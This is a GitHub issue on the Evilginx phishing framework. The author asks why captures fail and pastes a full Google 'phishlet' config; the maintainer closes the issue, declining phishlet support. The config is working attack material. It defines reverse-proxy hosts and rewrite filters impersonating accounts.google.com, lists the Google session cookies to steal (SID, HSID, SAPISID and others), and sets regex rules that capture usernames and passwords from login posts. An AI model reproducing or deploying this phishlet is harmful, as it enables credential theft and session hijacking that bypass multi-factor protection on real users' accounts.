Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Not collecting anything. #300

Closed
infosecwatchman opened this issue May 15, 2019 · 2 comments
Closed

Not collecting anything. #300

infosecwatchman opened this issue May 15, 2019 · 2 comments

Comments

@infosecwatchman
Copy link

infosecwatchman commented May 15, 2019

Hello,
I'm having some trouble running any phishlet, I tried the outlook phishlet, and created my own google phishlet. I am successfully running through the login process with the landing url from Evilginx, but I am not collecting any of usernames, passwords, or cookie. I get a log from the sessions but nothing else. Here is my google phishlet for reference, although I think it is a different problem because I didn't change anything and the outlook isn't working either.

     1  name: 'google'
     2	author: '@GregorioSecurity'
     3	min_ver: '2.3.0'
     4	proxy_hosts:
     5	  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
     6	  - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
     7	sub_filters:
     8	  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
     9	  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
    10	  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="://{hostname}', replace: 'href="https://ssl.{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
    11	  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
    12	auth_tokens:
    13	  - domain: '.google.com'
    14	    keys: ['SID', 'HSID', 'SSID', 'APISID', 'SAPISID', 'NID','CGIC','SNID', 'LSID','1P_JAR',]
    15	  - domain: 'accounts.google.com'
    16	    keys: ['GAPS', 'LSID']	
    17	credentials:
    18	  username:
    19	    key: '(login|Email)'
    20	    search: '(.*)'
    21	    type: 'post'
    22	  password:
    23	    key: '(passwd|Passwd)'
    24	    search: '(.*)'
    25	    type: 'post'
    26	login:
    27	  domain: 'accounts.google.com'
    28	  path: '/signin/v2/identifier'
    29	  path: '/ServiceLogin/identifier'
@infosecwatchman
Copy link
Author

@kgretzky Are you closing this because no one answered, or because this was resolved in another ticket?

@kgretzky
Copy link
Owner

I'm closing because you asked for support regarding phishlets.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants